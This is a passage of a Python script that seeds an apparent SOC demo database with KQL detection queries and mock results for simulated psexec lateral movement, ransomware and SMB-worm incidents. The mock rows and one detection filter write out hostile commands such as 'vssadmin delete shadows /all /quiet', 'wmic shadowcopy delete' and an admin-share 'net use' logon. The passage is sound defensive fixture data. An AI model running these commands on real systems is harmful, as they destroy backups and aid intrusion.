            ["2026-02-13 16:47:01", "10.14.3.11", "HR-LAPTOP-011", "psexec.exe", "admin.svc"],
        ]),
    ),
    KQLQuery(
        query_name="Service account logon activity",
        query_description="Review all logon events for the admin service account across the environment.",
        kql_statement="IdentityLogonEvents\n| where AccountUpn == 'admin.svc@company.com'\n| summarize count() by DeviceName, LogonType, bin(Timestamp, 1h)\n| sort by Timestamp desc",
        related_entity_type="device",
        related_entity_id="IT-ADMIN-004",
        execution_timestamp=datetime(2026, 2, 13, 17, 10, 0),
        result_count=4,
        result_columns_json=json.dumps(["DeviceName", "LogonType", "Timestamp", "count_"]),
        result_rows_json=json.dumps([
            ["IT-ADMIN-004", "Interactive", "2026-02-13 16:00", "3"],
            ["FIN-WS-027", "RemoteInteractive", "2026-02-13 16:00", "4"],
            ["HR-LAPTOP-011", "RemoteInteractive", "2026-02-13 16:00", "2"],
            ["IT-ADMIN-004", "Network", "2026-02-13 15:00", "19"],
        ]),
    ),

    # ---- FILE-SRV-002 (Ransomware) ----
    KQLQuery(
        query_name="Mass file encryption events",
        query_description="Detect mass file rename events indicating ransomware encryption activity.",
        kql_statement="DeviceFileEvents\n| where DeviceName == 'FILE-SRV-002'\n| where ActionType == 'FileRenamed'\n| where FileName endswith '.lockbit'\n| summarize count() by bin(Timestamp, 1m), InitiatingProcessFileName\n| sort by Timestamp asc",
        related_entity_type="device",
        related_entity_id="FILE-SRV-002",
        execution_timestamp=datetime(2026, 2, 15, 3, 0, 0),
        result_count=4,
        result_columns_json=json.dumps(["Timestamp", "count_", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-15 02:11:00", "487", "winupdate32.exe"],
            ["2026-02-15 02:11:01", "1024", "winupdate32.exe"],
            ["2026-02-15 02:11:02", "891", "winupdate32.exe"],
            ["2026-02-15 02:11:03", "445", "winupdate32.exe"],
        ]),
    ),
    KQLQuery(
        query_name="Shadow copy deletion",
        query_description="Detect vssadmin or wmic commands used to delete volume shadow copies, a common ransomware indicator.",
        kql_statement="DeviceProcessEvents\n| where DeviceName == 'FILE-SRV-002'\n| where FileName in ('vssadmin.exe', 'wmic.exe')\n| where ProcessCommandLine has_any ('delete shadows', 'shadowcopy delete')\n| project Timestamp, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="FILE-SRV-002",
        execution_timestamp=datetime(2026, 2, 15, 3, 5, 0),
        result_count=2,
        result_columns_json=json.dumps(["Timestamp", "FileName", "ProcessCommandLine", "AccountName", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-15 02:11:05", "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet", "SYSTEM", "winupdate32.exe"],
            ["2026-02-15 02:11:07", "wmic.exe", "wmic shadowcopy delete /nointeractive", "SYSTEM", "winupdate32.exe"],
        ]),
    ),
    KQLQuery(
        query_name="Ransomware process timeline",
        query_description="Reconstruct the full process execution timeline on the file server around the ransomware event.",
        kql_statement="DeviceProcessEvents\n| where DeviceName == 'FILE-SRV-002'\n| where Timestamp between (datetime(2026-02-15 02:00) .. datetime(2026-02-15 03:00))\n| project Timestamp, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName\n| sort by Timestamp asc",
        related_entity_type="device",
        related_entity_id="FILE-SRV-002",
        execution_timestamp=datetime(2026, 2, 15, 3, 10, 0),
        result_count=6,
        result_columns_json=json.dumps(["Timestamp", "FileName", "ProcessCommandLine", "AccountName"]),
        result_rows_json=json.dumps([
            ["2026-02-15 02:10:01", "winupdate32.exe", "winupdate32.exe", "SYSTEM"],
            ["2026-02-15 02:10:03", "cmd.exe", "cmd.exe /c whoami && net localgroup administrators", "SYSTEM"],
            ["2026-02-15 02:10:08", "net.exe", "net use \\\\10.14.4.10\\C$ /user:svc.backup ****", "SYSTEM"],
            ["2026-02-15 02:11:05", "vssadmin.exe", "vssadmin.exe delete shadows /all /quiet", "SYSTEM"],
            ["2026-02-15 02:11:07", "wmic.exe", "wmic shadowcopy delete /nointeractive", "SYSTEM"],
            ["2026-02-15 02:11:10", "cmd.exe", "cmd.exe /c copy LOCKBIT-README.txt C:\\Users\\Public\\", "SYSTEM"],
        ]),
    ),

    # ---- DEV-WS-015 (Network Worm) ----
    KQLQuery(
        query_name="SMB exploit scan activity",
        query_description="Detect port 445 scanning behavior from the infected workstation across the subnet.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'DEV-WS-015'\n| where RemotePort == 445\n| where ActionType == 'ConnectionAttempted'\n| summarize count() by bin(Timestamp, 1m), RemoteIP\n| sort by Timestamp asc",
        related_entity_type="device",
        related_entity_id="DEV-WS-015",
        execution_timestamp=datetime(2026, 2, 16, 8, 0, 0),
        result_count=6,
        result_columns_json=json.dumps(["Timestamp", "count_", "RemoteIP"]),
        result_rows_json=json.dumps([
            ["2026-02-16 07:01:00", "4", "10.14.6.19"],
            ["2026-02-16 07:01:00", "4", "10.14.6.31"],
            ["2026-02-16 07:01:00", "4", "10.14.6.42"],
            ["2026-02-16 07:01:00", "4", "10.14.6.50"],
            ["2026-02-16 07:01:00", "4", "10.14.6.63"],
            ["2026-02-16 07:01:00", "4", "10.14.6.71"],
        ]),
    ),
    KQLQuery(
        query_name="Worm propagation targets",
        query_description="Identify hosts that received successful SMB exploit connections from the worm-infected device.",
        kql_statement="DeviceNetworkEvents\n| where DeviceName == 'DEV-WS-015'\n| where RemotePort == 445\n| where ActionType == 'ConnectionSuccess'\n| project Timestamp, RemoteIP, RemoteDeviceName, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="DEV-WS-015",
        execution_timestamp=datetime(2026, 2, 16, 8, 5, 0),
        result_count=3,
        result_columns_json=json.dumps(["Timestamp", "RemoteIP", "RemoteDeviceName", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-16 07:01:15", "10.14.6.19", "DEV-WS-016", "mssecsvc.exe"],
            ["2026-02-16 07:01:22", "10.14.6.31", "DEV-WS-019", "mssecsvc.exe"],
            ["2026-02-16 07:02:10", "10.14.6.42", "DEV-WS-022", "mssecsvc.exe"],
        ]),
    ),
    KQLQuery(
        query_name="Dropped worm components",
        query_description="List all files dropped by the worm process on the infected device.",
        kql_statement="DeviceFileEvents\n| where DeviceName == 'DEV-WS-015'\n| where ActionType == 'FileCreated'\n| where InitiatingProcessFileName in ('mssecsvc.exe', 'tasksche.exe')\n| project Timestamp, FileName, FolderPath, SHA256, InitiatingProcessFileName",
        related_entity_type="device",
        related_entity_id="DEV-WS-015",
        execution_timestamp=datetime(2026, 2, 16, 8, 10, 0),
        result_count=4,
        result_columns_json=json.dumps(["Timestamp", "FileName", "FolderPath", "SHA256", "InitiatingProcessFileName"]),
        result_rows_json=json.dumps([
            ["2026-02-16 07:00:06", "mssecsvc.exe", "C:\\Windows\\", "e1b4d7f0...c1f4", "SYSTEM"],
            ["2026-02-16 07:00:07", "tasksche.exe", "C:\\Windows\\", "e2c5e8a1...d3f6", "mssecsvc.exe"],
            ["2026-02-16 07:00:09", "u.wnry", "C:\\Windows\\", "a3f2d1c0...e4b7", "tasksche.exe"],
            ["2026-02-16 07:00:11", "t.wnry", "C:\\Windows\\", "b4a3c2d1...f5e8", "tasksche.exe"],
        ]),
    ),

]


def seed():
    init_db()
    with Session(engine) as session:
        # Only seed if the database is empty
        existing = session.exec(select(Incident)).first()
        if existing:
            print("Database already seeded, skipping.")
            return

        for incident in INCIDENTS:
            session.add(incident)
        for fi in FILE_INTELLIGENCE:
            session.add(fi)
        for dc in DEVICE_CONTEXTS:
            session.add(dc)
        for uc in USER_CONTEXTS:
            session.add(uc)
        for cc in CAMPAIGN_CONTEXTS:
            session.add(cc)
        for ma in MALWARE_ANALYSES:
            session.add(ma)
        for kq in KQL_QUERIES:
            session.add(kq)
        session.commit()
        print(f"Seeded {len(INCIDENTS)} incidents, {len(FILE_INTELLIGENCE)} file intelligence, "
              f"{len(DEVICE_CONTEXTS)} device contexts, {len(USER_CONTEXTS)} user contexts, "
              f"{len(CAMPAIGN_CONTEXTS)} campaigns, {len(MALWARE_ANALYSES)} malware analyses, "
              f"{len(KQL_QUERIES)} KQL queries.")


if __name__ == "__main__":
    seed()
